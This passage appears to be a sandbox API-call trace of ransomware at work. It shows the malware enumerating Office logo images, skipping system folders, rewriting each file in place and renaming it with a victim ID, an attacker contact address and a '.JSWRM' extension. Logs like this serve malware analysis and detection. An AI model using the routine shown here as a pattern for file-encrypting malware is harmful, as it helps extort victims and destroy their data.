returned 5 [0133.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.733] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2513) returned 1 [0133.733] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.733] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9d0, lpOverlapped=0x0) returned 1 [0133.735] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.735] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9d0, lpOverlapped=0x0) returned 1 [0133.735] CloseHandle (hObject=0x238) returned 1 [0133.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.737] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x627, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-black_scale-80.png", cAlternateFileName="PO605C~1.PNG")) returned 1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.737] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.752] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1575) returned 1 [0133.752] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.752] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x620, lpOverlapped=0x0) returned 1 [0133.754] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.754] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x620, lpOverlapped=0x0) returned 1 [0133.754] CloseHandle (hObject=0x238) returned 1 [0133.754] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.756] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x705, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-white_scale-100.png", cAlternateFileName="POF730~1.PNG")) returned 1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.756] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.757] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1797) returned 1 [0133.757] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.757] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x700, lpOverlapped=0x0) returned 1 [0133.759] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.759] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x700, lpOverlapped=0x0) returned 1 [0133.759] CloseHandle (hObject=0x238) returned 1 [0133.759] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.760] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-white_scale-140.png", cAlternateFileName="POD5F0~1.PNG")) returned 1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.760] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.761] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2034) returned 1 [0133.761] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.761] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7f0, lpOverlapped=0x0) returned 1 [0133.763] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.763] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7f0, lpOverlapped=0x0) returned 1 [0133.763] CloseHandle (hObject=0x238) returned 1 [0133.763] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.764] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-white_scale-180.png", cAlternateFileName="PO9322~1.PNG")) returned 1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.764] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.765] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2514) returned 1 [0133.765] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.765] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9d0, lpOverlapped=0x0) returned 1 [0133.792] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.792] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9d0, lpOverlapped=0x0) returned 1 [0133.792] CloseHandle (hObject=0x238) returned 1 [0133.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.794] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x63a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-white_scale-80.png", cAlternateFileName="POB2A2~1.PNG")) returned 1 [0133.797] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.797] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.797] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.797] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.798] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.798] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0133.798] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.798] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.798] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.798] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-80.png", 